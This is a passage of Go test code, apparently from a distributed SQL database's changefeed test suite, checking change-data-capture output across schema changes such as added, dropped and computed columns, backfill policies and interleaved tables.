t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
log.Flush()
entries, err := log.FetchEntriesFromFiles(0, math.MaxInt64, 1, regexp.MustCompile("cdc ux violation"))
if err != nil {
t.Fatal(err)
}
if len(entries) > 0 {
t.Fatalf("Found violation of CDC's guarantees: %v", entries)
}
}
// Test schema changes that require a backfill when the backfill option is
// allowed.
func TestChangefeedSchemaChangeAllowBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Expected semantics:
//
// 1) DROP COLUMN
// If the table descriptor is at version 1 when the `ALTER TABLE` stmt is issued,
// we expect the changefeed level backfill to be triggered at the `ModificationTime` of
// version 2 of the said descriptor. This is because this is the descriptor
// version at which the dropped column stops being visible to SELECTs. Note that
// this means we will see row updates resulting from the schema-change level
// backfill _after_ the changefeed level backfill.
//
// 2) ADD COLUMN WITH DEFAULT & ADD COLUMN AS ... STORED
// If the table descriptor is at version 1 when the `ALTER TABLE` stmt is issued,
// we expect the changefeed level backfill to be triggered at the
// `ModificationTime` of version 4 of said descriptor. This is because this is the
// descriptor version which makes the newly-added column (and thus its
// schema-change level backfill) publicly visible. This means we will see row
// updates resulting from the
// schema-change level backfill _before_ the changefeed level backfill.
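// Concretely (illustrative): for `ALTER TABLE t ADD COLUMN b STRING DEFAULT 'd'`
// issued at version 1, a reader first sees the existing rows re-emitted without
// `b` (schema-change level backfill), and then the same rows re-emitted with
// `"b": "d"` stamped with version 4's ModificationTime (changefeed level
// backfill). The subtests below assert exactly this ordering.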
t.Run(`add column with default`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_def (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO add_column_def VALUES (1)`)
sqlDB.Exec(t, `INSERT INTO add_column_def VALUES (2)`)
addColumnDef := feed(t, f, `CREATE CHANGEFEED FOR add_column_def WITH updated`)
defer closeFeed(t, addColumnDef)
assertPayloadsStripTs(t, addColumnDef, []string{
`add_column_def: [1]->{"after": {"a": 1}}`,
`add_column_def: [2]->{"after": {"a": 2}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_def ADD COLUMN b STRING DEFAULT 'd'`)
ts := fetchDescVersionModificationTime(t, db, f, `add_column_def`, 4)
// Schema change backfill
assertPayloadsStripTs(t, addColumnDef, []string{
`add_column_def: [1]->{"after": {"a": 1}}`,
`add_column_def: [2]->{"after": {"a": 2}}`,
})
// Changefeed level backfill
assertPayloads(t, addColumnDef, []string{
fmt.Sprintf(`add_column_def: [1]->{"after": {"a": 1, "b": "d"}, "updated": "%s"}`,
ts.AsOfSystemTime()),
fmt.Sprintf(`add_column_def: [2]->{"after": {"a": 2, "b": "d"}, "updated": "%s"}`,
ts.AsOfSystemTime()),
})
})
t.Run(`add column computed`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_col_comp (a INT PRIMARY KEY, b INT AS (a + 5) STORED)`)
sqlDB.Exec(t, `INSERT INTO add_col_comp VALUES (1)`)
sqlDB.Exec(t, `INSERT INTO add_col_comp (a) VALUES (2)`)
addColComp := feed(t, f, `CREATE CHANGEFEED FOR add_col_comp WITH updated`)
defer closeFeed(t, addColComp)
assertPayloadsStripTs(t, addColComp, []string{
`add_col_comp: [1]->{"after": {"a": 1, "b": 6}}`,
`add_col_comp: [2]->{"after": {"a": 2, "b": 7}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_col_comp ADD COLUMN c INT AS (a + 10) STORED`)
assertPayloadsStripTs(t, addColComp, []string{
`add_col_comp: [1]->{"after": {"a": 1, "b": 6}}`,
`add_col_comp: [2]->{"after": {"a": 2, "b": 7}}`,
})
ts := fetchDescVersionModificationTime(t, db, f, `add_col_comp`, 4)
assertPayloads(t, addColComp, []string{
fmt.Sprintf(`add_col_comp: [1]->{"after": {"a": 1, "b": 6, "c": 11}, "updated": "%s"}`,
ts.AsOfSystemTime()),
fmt.Sprintf(`add_col_comp: [2]->{"after": {"a": 2, "b": 7, "c": 12}, "updated": "%s"}`,
ts.AsOfSystemTime()),
})
})
t.Run(`drop column`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_column (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (1, '1')`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (2, '2')`)
dropColumn := feed(t, f, `CREATE CHANGEFEED FOR drop_column WITH updated`)
defer closeFeed(t, dropColumn)
assertPayloadsStripTs(t, dropColumn, []string{
`drop_column: [1]->{"after": {"a": 1, "b": "1"}}`,
`drop_column: [2]->{"after": {"a": 2, "b": "2"}}`,
})
sqlDB.Exec(t, `ALTER TABLE drop_column DROP COLUMN b`)
ts := fetchDescVersionModificationTime(t, db, f, `drop_column`, 2)
assertPayloads(t, dropColumn, []string{
fmt.Sprintf(`drop_column: [1]->{"after": {"a": 1}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`drop_column: [2]->{"after": {"a": 2}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (3)`)
assertPayloadsStripTs(t, dropColumn, []string{
`drop_column: [3]->{"after": {"a": 3}}`,
`drop_column: [1]->{"after": {"a": 1}}`,
`drop_column: [2]->{"after": {"a": 2}}`,
})
})
t.Run(`multiple alters`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE multiple_alters (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO multiple_alters VALUES (1, '1')`)
sqlDB.Exec(t, `INSERT INTO multiple_alters VALUES (2, '2')`)
// Set up a hook to pause the changefeed on the next emit.
var wg sync.WaitGroup
waitSinkHook := func(_ context.Context) error {
wg.Wait()
return nil
}
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
knobs.BeforeEmitRow = waitSinkHook
multipleAlters := feed(t, f, `CREATE CHANGEFEED FOR multiple_alters WITH updated`)
defer closeFeed(t, multipleAlters)
assertPayloadsStripTs(t, multipleAlters, []string{
`multiple_alters: [1]->{"after": {"a": 1, "b": "1"}}`,
`multiple_alters: [2]->{"after": {"a": 2, "b": "2"}}`,
})
// Wait on the next emit, queue up three ALTERs. The next poll process
// will see all of them at once.
wg.Add(1)
waitForSchemaChange(t, sqlDB, `ALTER TABLE multiple_alters DROP COLUMN b`)
waitForSchemaChange(t, sqlDB, `ALTER TABLE multiple_alters ADD COLUMN c STRING DEFAULT 'cee'`)
waitForSchemaChange(t, sqlDB, `ALTER TABLE multiple_alters ADD COLUMN d STRING DEFAULT 'dee'`)
wg.Done()
ts := fetchDescVersionModificationTime(t, db, f, `multiple_alters`, 2)
// Changefeed level backfill for DROP COLUMN b.
assertPayloads(t, multipleAlters, []string{
fmt.Sprintf(`multiple_alters: [1]->{"after": {"a": 1}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`multiple_alters: [2]->{"after": {"a": 2}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
assertPayloadsStripTs(t, multipleAlters, []string{
// Schema-change backfill for DROP COLUMN b.
`multiple_alters: [1]->{"after": {"a": 1}}`,
`multiple_alters: [2]->{"after": {"a": 2}}`,
// Schema-change backfill for ADD COLUMN c.
`multiple_alters: [1]->{"after": {"a": 1}}`,
`multiple_alters: [2]->{"after": {"a": 2}}`,
})
ts = fetchDescVersionModificationTime(t, db, f, `multiple_alters`, 7)
// Changefeed level backfill for ADD COLUMN c.
assertPayloads(t, multipleAlters, []string{
fmt.Sprintf(`multiple_alters: [1]->{"after": {"a": 1, "c": "cee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`multiple_alters: [2]->{"after": {"a": 2, "c": "cee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
// Schema change level backfill for ADD COLUMN d.
assertPayloadsStripTs(t, multipleAlters, []string{
`multiple_alters: [1]->{"after": {"a": 1, "c": "cee"}}`,
`multiple_alters: [2]->{"after": {"a": 2, "c": "cee"}}`,
})
ts = fetchDescVersionModificationTime(t, db, f, `multiple_alters`, 10)
// Changefeed level backfill for ADD COLUMN d.
assertPayloads(t, multipleAlters, []string{
// Backfill no-ops for column D (C schema change is complete)
// TODO(dan): Track duplicates more precisely in sinklessFeed/tableFeed.
// Scan output for column C
fmt.Sprintf(`multiple_alters: [1]->{"after": {"a": 1, "c": "cee", "d": "dee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
fmt.Sprintf(`multiple_alters: [2]->{"after": {"a": 2, "c": "cee", "d": "dee"}, "updated": "%s"}`, ts.AsOfSystemTime()),
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
log.Flush()
entries, err := log.FetchEntriesFromFiles(0, math.MaxInt64, 1, regexp.MustCompile("cdc ux violation"))
if err != nil {
t.Fatal(err)
}
if len(entries) > 0 {
t.Fatalf("Found violation of CDC's guarantees: %v", entries)
}
}
// fetchDescVersionModificationTime fetches the `ModificationTime` of the specified
// `version` of `tableName`'s table descriptor.
func fetchDescVersionModificationTime(
t testing.TB, db *gosql.DB, f cdctest.TestFeedFactory, tableName string, version int,
) hlc.Timestamp {
tblKey := roachpb.Key(keys.MakeTablePrefix(keys.DescriptorTableID))
header := roachpb.RequestHeader{
Key: tblKey,
EndKey: tblKey.PrefixEnd(),
}
dropColTblID := sqlutils.QueryTableID(t, db, `d`, "public", tableName)
req := &roachpb.ExportRequest{
RequestHeader: header,
MVCCFilter: roachpb.MVCCFilter_All,
StartTime: hlc.Timestamp{},
ReturnSST: true,
}
clock := hlc.NewClock(hlc.UnixNano, time.Minute)
hh := roachpb.Header{Timestamp: clock.Now()}
res, pErr := kv.SendWrappedWith(context.Background(),
f.Server().DB().NonTransactionalSender(), hh, req)
if pErr != nil {
t.Fatal(pErr.GoError())
}
for _, file := range res.(*roachpb.ExportResponse).Files {
it, err := storage.NewMemSSTIterator(file.SST, false /* verify */)
if err != nil {
t.Fatal(err)
}
defer it.Close()
for it.SeekGE(storage.NilKey); ; it.Next() {
if ok, err := it.Valid(); err != nil {
t.Fatal(err)
} else if !ok {
break
}
k := it.UnsafeKey()
remaining, _, _, err := sqlbase.DecodeTableIDIndexID(k.Key)
if err != nil {
t.Fatal(err)
}
_, tableID, err := encoding.DecodeUvarintAscending(remaining)
if err != nil {
t.Fatal(err)
}
if tableID != uint64(dropColTblID) {
continue
}
unsafeValue := it.UnsafeValue()
if unsafeValue == nil {
t.Fatal(errors.New(`value was dropped or truncated`))
}
value := roachpb.Value{RawBytes: unsafeValue}
var desc sqlbase.Descriptor
if err := value.GetProto(&desc); err != nil {
t.Fatal(err)
}
if tableDesc := desc.Table(k.Timestamp); tableDesc != nil {
if int(tableDesc.Version) == version {
return tableDesc.ModificationTime
}
}
}
}
t.Fatal(errors.New(`couldn't find table desc for given version`))
return hlc.Timestamp{}
}
// Regression test for #34314
func TestChangefeedAfterSchemaChangeBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE after_backfill (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO after_backfill VALUES (0)`)
sqlDB.Exec(t, `ALTER TABLE after_backfill ADD COLUMN b INT DEFAULT 1`)
sqlDB.Exec(t, `INSERT INTO after_backfill VALUES (2, 3)`)
afterBackfill := feed(t, f, `CREATE CHANGEFEED FOR after_backfill`)
defer closeFeed(t, afterBackfill)
assertPayloads(t, afterBackfill, []string{
`after_backfill: [0]->{"after": {"a": 0, "b": 1}}`,
`after_backfill: [2]->{"after": {"a": 2, "b": 3}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
log.Flush()
entries, err := log.FetchEntriesFromFiles(0, math.MaxInt64, 1, regexp.MustCompile("cdc ux violation"))
if err != nil {
t.Fatal(err)
}
if len(entries) > 0 {
t.Fatalf("Found violation of CDC's guarantees: %v", entries)
}
}
func TestChangefeedInterleaved(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE grandparent (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO grandparent VALUES (0, 'grandparent-0')`)
grandparent := feed(t, f, `CREATE CHANGEFEED FOR grandparent`)
defer closeFeed(t, grandparent)
assertPayloads(t, grandparent, []string{
`grandparent: [0]->{"after": {"a": 0, "b": "grandparent-0"}}`,
})
sqlDB.Exec(t,
`CREATE TABLE parent (a INT PRIMARY KEY, b STRING) `+
`INTERLEAVE IN PARENT grandparent (a)`)
sqlDB.Exec(t, `INSERT INTO grandparent VALUES (1, 'grandparent-1')`)
sqlDB.Exec(t, `INSERT INTO parent VALUES (1, 'parent-1')`)
parent := feed(t, f, `CREATE CHANGEFEED FOR parent`)
defer closeFeed(t, parent)
assertPayloads(t, grandparent, []string{
`grandparent: [1]->{"after": {"a": 1, "b": "grandparent-1"}}`,
})
assertPayloads(t, parent, []string{
`parent: [1]->{"after": {"a": 1, "b": "parent-1"}}`,
})
sqlDB.Exec(t,
`CREATE TABLE child (a INT PRIMARY KEY, b STRING) INTERLEAVE IN PARENT parent (a)`)
sqlDB.Exec(t, `INSERT INTO grandparent VALUES (2, 'grandparent-2')`)
sqlDB.Exec(t, `INSERT INTO parent VALUES (2, 'parent-2')`)
sqlDB.Exec(t, `INSERT INTO child VALUES (2, 'child-2')`)
child := feed(t, f, `CREATE CHANGEFEED FOR child`)
defer closeFeed(t, child)
assertPayloads(t, grandparent, []string{
`grandparent: [2]->{"after": {"a": 2, "b": "grandparent-2"}}`,
})
assertPayloads(t, parent, []string{
`parent: [2]->{"after": {"a": 2, "b": "parent-2"}}`,
})
assertPayloads(t, child, []string{
`child: [2]->{"after": {"a": 2, "b": "child-2"}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedColumnFamily(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Table with 2 column families.
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING, FAMILY (a), FAMILY (b))`)
if strings.Contains(t.Name(), `enterprise`) {
sqlDB.ExpectErr(t, `exactly 1 column family`, `CREATE CHANGEFEED FOR foo`)
} else {
sqlDB.ExpectErr(t, `exactly 1 column family`, `EXPERIMENTAL CHANGEFEED FOR foo`)
}
// Table with a second column family added after the changefeed starts.
sqlDB.Exec(t, `CREATE TABLE bar (a INT PRIMARY KEY, FAMILY f_a (a))`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (0)`)
bar := feed(t, f, `CREATE CHANGEFEED FOR bar`)
defer closeFeed(t, bar)
assertPayloads(t, bar, []string{
`bar: [0]->{"after": {"a": 0}}`,
})
sqlDB.Exec(t, `ALTER TABLE bar ADD COLUMN b STRING CREATE FAMILY f_b`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (1)`)
if _, err := bar.Next(); !testutils.IsError(err, `exactly 1 column family`) {
t.Errorf(`expected "exactly 1 column family" error got: %+v`, err)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedStopOnSchemaChange(t *testing.T) {
defer leaktest.AfterTest(t)()
if testing.Short() || util.RaceEnabled {
t.Skip("takes too long with race enabled")
}
schemaChangeTimestampRegexp := regexp.MustCompile(`schema change occurred at ([0-9]+\.[0-9]+)`)
timestampStrFromError := func(t *testing.T, err error) string {
require.Regexp(t, schemaChangeTimestampRegexp, err)
m := schemaChangeTimestampRegexp.FindStringSubmatch(err.Error())
return m[1]
}
waitForSchemaChangeErrorAndCloseFeed := func(t *testing.T, f cdctest.TestFeed) (tsStr string) {
t.Helper()
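// Drain events until the feed surfaces the schema-change error, then pull
// the timestamp out of the error message and close the feed.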
for {
if ev, err := f.Next(); err != nil {
log.Infof(context.TODO(), "got event %v %v", ev, err)
tsStr = timestampStrFromError(t, err)
_ = f.Close()
return tsStr
}
}
}
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Shorten the intervals so this test doesn't take so long. We need to wait
// for timestamps to get resolved.
sqlDB.Exec(t, "SET CLUSTER SETTING changefeed.experimental_poll_interval = '200ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.target_duration = '50ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.close_fraction = .99")
t.Run("add column not null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_not_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_not_null`)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (0)`)
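// With schema_change_events='column_changes' and schema_change_policy='stop',
// the feed exits at the schema change with an error that records its
// timestamp; the test then restarts the feed from that cursor.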
addColumnNotNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_not_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (1)`)
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [0]->{"after": {"a": 0}}`,
`add_column_not_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_not_null ADD COLUMN b INT NOT NULL DEFAULT 0`)
sqlDB.Exec(t, "INSERT INTO add_column_not_null VALUES (2, 1)")
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, addColumnNotNull)
addColumnNotNull = feed(t, f, `CREATE CHANGEFEED FOR add_column_not_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, addColumnNotNull)
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [2]->{"after": {"a": 2, "b": 1}}`,
})
})
t.Run("add column null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_null`)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (0)`)
addColumnNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (1)`)
assertPayloads(t, addColumnNull, []string{
`add_column_null: [0]->{"after": {"a": 0}}`,
`add_column_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_null ADD COLUMN b INT`)
sqlDB.Exec(t, "INSERT INTO add_column_null VALUES (2, NULL)")
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, addColumnNull)
addColumnNull = feed(t, f, `CREATE CHANGEFEED FOR add_column_null `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, addColumnNull)
assertPayloads(t, addColumnNull, []string{
`add_column_null: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`add column computed`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_comp_col (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_comp_col`)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (0)`)
addCompCol := feed(t, f, `CREATE CHANGEFEED FOR add_comp_col `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (1)`)
assertPayloads(t, addCompCol, []string{
`add_comp_col: [0]->{"after": {"a": 0}}`,
`add_comp_col: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_comp_col ADD COLUMN b INT AS (a + 1) STORED`)
sqlDB.Exec(t, "INSERT INTO add_comp_col VALUES (2)")
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, addCompCol)
addCompCol = feed(t, f, `CREATE CHANGEFEED FOR add_comp_col `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, addCompCol)
assertPayloads(t, addCompCol, []string{
`add_comp_col: [2]->{"after": {"a": 2, "b": 3}}`,
})
})
t.Run("drop column", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_column (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE drop_column`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (0, NULL)`)
dropColumn := feed(t, f, `CREATE CHANGEFEED FOR drop_column `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (1, 2)`)
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0, "b": null}}`,
`drop_column: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `ALTER TABLE drop_column DROP COLUMN b`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (2)`)
tsStr := waitForSchemaChangeErrorAndCloseFeed(t, dropColumn)
dropColumn = feed(t, f, `CREATE CHANGEFEED FOR drop_column `+
`WITH schema_change_events='column_changes', schema_change_policy='stop', cursor = '`+tsStr+`'`)
defer closeFeed(t, dropColumn)
// NB: You might expect to only see the new row here but we'll see them
// all because we cannot distinguish between the index backfill and
// foreground writes. See #35738.
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0}}`,
`drop_column: [1]->{"after": {"a": 1}}`,
`drop_column: [2]->{"after": {"a": 2}}`,
})
})
t.Run("add index", func(t *testing.T) {
// This case does not exit the changefeed: adding an index is not a column
// change, so the feed keeps running.
sqlDB.Exec(t, `CREATE TABLE add_index (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE add_index`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (0, NULL)`)
addIndex := feed(t, f, `CREATE CHANGEFEED FOR add_index `+
`WITH schema_change_events='column_changes', schema_change_policy='stop'`)
defer closeFeed(t, addIndex)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (1, 2)`)
assertPayloads(t, addIndex, []string{
`add_index: [0]->{"after": {"a": 0, "b": null}}`,
`add_index: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `CREATE INDEX ON add_index (b)`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (2, NULL)`)
assertPayloads(t, addIndex, []string{
`add_index: [2]->{"after": {"a": 2, "b": null}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedNoBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
if testing.Short() || util.RaceEnabled {
t.Skip("takes too long with race enabled")
}
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Shorten the intervals so this test doesn't take so long. We need to wait
// for timestamps to get resolved.
sqlDB.Exec(t, "SET CLUSTER SETTING changefeed.experimental_poll_interval = '200ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.target_duration = '50ms'")
sqlDB.Exec(t, "SET CLUSTER SETTING kv.closed_timestamp.close_fraction = .99")
t.Run("add column not null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_not_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_not_null`)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (0)`)
addColumnNotNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_not_null `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addColumnNotNull)
sqlDB.Exec(t, `INSERT INTO add_column_not_null VALUES (1)`)
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [0]->{"after": {"a": 0}}`,
`add_column_not_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_not_null ADD COLUMN b INT NOT NULL DEFAULT 0`)
sqlDB.Exec(t, "INSERT INTO add_column_not_null VALUES (2, 1)")
assertPayloads(t, addColumnNotNull, []string{
`add_column_not_null: [2]->{"after": {"a": 2, "b": 1}}`,
})
})
t.Run("add column null", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_column_null (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_column_null`)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (0)`)
addColumnNull := feed(t, f, `CREATE CHANGEFEED FOR add_column_null `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addColumnNull)
sqlDB.Exec(t, `INSERT INTO add_column_null VALUES (1)`)
assertPayloads(t, addColumnNull, []string{
`add_column_null: [0]->{"after": {"a": 0}}`,
`add_column_null: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column_null ADD COLUMN b INT`)
sqlDB.Exec(t, "INSERT INTO add_column_null VALUES (2, NULL)")
assertPayloads(t, addColumnNull, []string{
`add_column_null: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`add column computed`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_comp_col (a INT PRIMARY KEY)`)
defer sqlDB.Exec(t, `DROP TABLE add_comp_col`)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (0)`)
addCompCol := feed(t, f, `CREATE CHANGEFEED FOR add_comp_col `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addCompCol)
sqlDB.Exec(t, `INSERT INTO add_comp_col VALUES (1)`)
assertPayloads(t, addCompCol, []string{
`add_comp_col: [0]->{"after": {"a": 0}}`,
`add_comp_col: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_comp_col ADD COLUMN b INT AS (a + 1) STORED`)
sqlDB.Exec(t, "INSERT INTO add_comp_col VALUES (2)")
assertPayloads(t, addCompCol, []string{
`add_comp_col: [2]->{"after": {"a": 2, "b": 3}}`,
})
})
t.Run("drop column", func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_column (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE drop_column`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (0, NULL)`)
dropColumn := feed(t, f, `CREATE CHANGEFEED FOR drop_column `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, dropColumn)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (1, 2)`)
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0, "b": null}}`,
`drop_column: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `ALTER TABLE drop_column DROP COLUMN b`)
sqlDB.Exec(t, `INSERT INTO drop_column VALUES (2)`)
// NB: You might expect to only see the new row here but we'll see them
// all because we cannot distinguish between the index backfill and
// foreground writes. See #35738.
assertPayloads(t, dropColumn, []string{
`drop_column: [0]->{"after": {"a": 0}}`,
`drop_column: [1]->{"after": {"a": 1}}`,
`drop_column: [2]->{"after": {"a": 2}}`,
})
})
t.Run("add index", func(t *testing.T) {
// This case does not exit the changefeed: adding an index is not a column
// change, so the feed keeps running.
sqlDB.Exec(t, `CREATE TABLE add_index (a INT PRIMARY KEY, b INT)`)
defer sqlDB.Exec(t, `DROP TABLE add_index`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (0, NULL)`)
addIndex := feed(t, f, `CREATE CHANGEFEED FOR add_index `+
`WITH schema_change_policy='nobackfill'`)
defer closeFeed(t, addIndex)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (1, 2)`)
assertPayloads(t, addIndex, []string{
`add_index: [0]->{"after": {"a": 0, "b": null}}`,
`add_index: [1]->{"after": {"a": 1, "b": 2}}`,
})
sqlDB.Exec(t, `CREATE INDEX ON add_index (b)`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (2, NULL)`)
assertPayloads(t, addIndex, []string{
`add_index: [2]->{"after": {"a": 2, "b": null}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedComputedColumn(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// TODO(dan): Also test a non-STORED computed column once we support them.
sqlDB.Exec(t, `CREATE TABLE cc (
a INT, b INT AS (a + 1) STORED, c INT AS (a + 2) STORED, PRIMARY KEY (b, a)
)`)
sqlDB.Exec(t, `INSERT INTO cc (a) VALUES (1)`)
cc := feed(t, f, `CREATE CHANGEFEED FOR cc`)
defer closeFeed(t, cc)
assertPayloads(t, cc, []string{
`cc: [2, 1]->{"after": {"a": 1, "b": 2, "c": 3}}`,
})
sqlDB.Exec(t, `INSERT INTO cc (a) VALUES (10)`)
assertPayloads(t, cc, []string{
`cc: [11, 10]->{"after": {"a": 10, "b": 11, "c": 12}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
